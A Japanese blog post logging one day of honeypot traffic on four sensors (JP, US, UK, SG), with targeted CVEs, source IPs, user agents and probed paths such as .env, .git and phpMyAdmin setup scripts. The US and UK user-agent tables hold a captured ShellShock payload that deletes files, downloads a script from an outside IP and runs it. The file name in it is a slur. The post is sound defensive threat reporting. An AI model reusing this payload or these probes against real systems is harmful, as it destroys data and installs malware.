2024/02/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/02/10分です。

特徴

共通

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為

を確認しました。

Location:UK

PHPの脆弱性(CVE-2012-1823)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：187 (前日比：-268)
US：総アクセス数：72 (前日比：-350)
UK：総アクセス数：128 (前日比：80)
SG：総アクセス数：122 (前日比：43)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
12	3.89.132.23	United States
24	4.228.66.180	United States
3	31.220.3.140	Germany
1	36.99.136.129	China
45	36.139.63.59	China
1	45.56.108.128	United States
1	89.190.156.234	United States
2	91.92.245.67	Bulgaria
5	91.209.70.106	Russia
1	101.32.192.203	Singapore
11	135.125.217.54	France
5	135.125.244.48	France
1	138.197.122.174	United States
45	150.109.234.88	Singapore
1	172.105.128.11	United States
11	179.43.163.210	Panama
1	185.180.143.189	Portugal
6	185.254.196.173	Ukraine
2	185.255.112.175	Germany
1	192.241.226.26	United States
1	198.199.95.66	United States
2	198.235.24.158	United States
2	205.210.31.159	United States
3	213.168.249.187	United States

UserAgent一覧

件数	UserAgent
98	`-`
3	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 7.1.1; XT1710-02 Build/NDS26.74-36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 8.0.0; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 8.1.0; GM 6 d) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1`
1	`Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30`
5	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
24	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2`
1	`Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16`
1	`Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30`
1	`Opera/7.50 (Windows ME; U) [en]`
1	`msnbot/1.1 ( http[:]//search[.]msn[.]com/msnbot.htm)`

リクエスト内容一覧

件数	Method	Request	Protocol
8		`\x16\x03\x01`
1	CONNECT	`api6[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/admin/.git/HEAD`	HTTP/1.1
2	GET	`/api/.git/HEAD`	HTTP/1.1
2	GET	`/app/.git/HEAD`	HTTP/1.1
2	GET	`/assets/.git/HEAD`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
2	GET	`/client/.git/HEAD`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
2	GET	`/core/.git/HEAD`	HTTP/1.1
2	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/dev/.git/HEAD`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/frontend/.git/HEAD`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/templates/.git/HEAD`	HTTP/1.1
2	GET	`/test/.git/HEAD`	HTTP/1.1
2	GET	`/web/.git/HEAD`	HTTP/1.1
2	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
1	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/.env.development.local`	HTTP/1.1
1	POST	`/.env.development`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production.local`	HTTP/1.1
1	POST	`/.env.production`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
3	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.196.102.75	France
1	5.196.102.76	France
1	23.94.8.254	United States
2	31.220.3.140	Germany
1	42.225.2.97	China
1	45.79.172.21	United States
4	45.79.181.223	United States
1	47.245.122.65	United States
1	50.118.145.238	United States
1	65.49.1.79	United States
1	65.49.1.114	United States
1	65.49.1.115	United States
1	65.49.1.116	United States
2	83.97.73.245	Germany
7	95.214.235.169	Ukraine
1	107.170.254.23	United States
1	139.59.101.104	Singapore
2	143.198.214.253	United States
6	148.153.45.234	United States
1	159.223.40.122	United States
1	162.120.71.104	United States
2	162.142.125.216	United States
4	165.22.54.194	United States
2	167.94.145.54	United States
2	167.248.133.33	United States
2	170.64.214.93	United States
1	185.180.140.6	Portugal
2	185.180.143.72	Portugal
7	185.196.8.126	United States
1	185.216.71.4	Bulgaria
1	185.224.128.10	Netherlands
3	193.203.15.206	United States
1	198.199.108.29	United States
2	205.210.31.152	United States
3	213.168.249.227	United States
1	222.140.182.185	China

UserAgent一覧

件数	UserAgent
1	`() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http[:]//192[.]3[.]152[.]183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh`
25	`-`
1	`MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0`
2	`Mozila/5.0`
1	`Mozilla/3.0 (Win16; I)`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; MATBJS; rv:11.0) like Gecko`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36`
10	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Googlebot/2.1; http[:]//www[.]google[.]com/bot.html)`
2	`Mozilla/5.0 zgrab/0.x`
4	`Mozilla/5.0`
1	`Twitterbot/1.0`
1	`msnbot/0.11 ( http[:]//search[.]msn[.]com/msnbot.htm)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\x04\x01`
3		`\x16\x03\x01\x01\x07\x01`
15		`\x16\x03\x01`
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
10	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/__MACOSX/.git/config`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
3	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/test.cgi`	HTTP/1.1
1	GET	`/data/.git/config`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hello`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/include/.git/config`	HTTP/1.1
1	GET	`/iyB9`	HTTP/1.1
1	GET	`/jquery-3.3.1.slim.min.js`	HTTP/1.1
1	GET	`/jquery-3.3.2.slim.min.js`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/shop/.git/config`	HTTP/1.1
1	GET	`/tmp/.git/config`	HTTP/1.1
1	GET	`/vcO4`	HTTP/1.1
1	GET	`/vendor/.git/config`	HTTP/1.1
1	GET	`/web/.git/config`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/zabbix/favicon.ico`	HTTP/1.1
1	GET	`http[:]//www[.]1ucn[.]com/proxychecker/index.php`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.196.102.66	France
1	5.196.102.71	France
1	20.51.198.148	United States
2	31.220.3.140	Germany
2	31.220.88.155	Spain
1	43.228.214.134	Singapore
1	45.79.181.223	United States
8	54.37.79.75	France
1	65.49.1.59	United States
3	74.82.47.2	United States
2	83.97.73.245	Germany
1	89.190.156.234	United States
1	91.191.209.206	Bulgaria
1	94.156.64.79	Bulgaria
8	95.214.235.169	Ukraine
1	104.243.47.253	United States
1	117.184.26.242	China
45	121.41.37.98	China
1	139.59.101.104	Singapore
1	146.70.15.40	Romania
1	146.70.38.104	Romania
2	152.32.173.15	Hong Kong
6	165.154.206.204	Hong Kong
2	167.71.197.10	United States
2	167.94.145.60	United States
2	170.64.135.218	United States
2	170.64.167.214	United States
2	170.64.183.188	United States
1	170.64.198.36	United States
1	172.105.128.11	United States
1	175.198.181.232	South Korea
1	185.36.81.23	United Kingdom
1	185.180.143.49	Portugal
2	185.180.143.72	Portugal
1	185.224.128.10	Netherlands
8	189.6.250.111	Brazil
1	192.241.216.43	United States
1	192.241.217.37	United States
1	194.233.75.51	Singapore
2	198.235.24.45	United States
2	198.235.24.148	United States
3	213.219.37.36	United States

UserAgent一覧

件数	UserAgent
1	`() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http[:]//192[.]3[.]152[.]183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh`
68	`-`
2	`Mozila/5.0`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 9_0_1) AppleWebKit/561.42 (KHTML, like Gecko) Chrome/98.0.1731 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/549.35 (KHTML, like Gecko) Chrome/97.0.1215 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/595.52 (KHTML, like Gecko) Chrome/80.0.52 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
5	`Mozilla/5.0`
1	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xc0\x01`
17		`\x16\x03\x01`
1	CONNECT	`www[.]naver[.]com:80`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.0
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
4	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/test.cgi`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/media/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/zabbix/favicon.ico`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
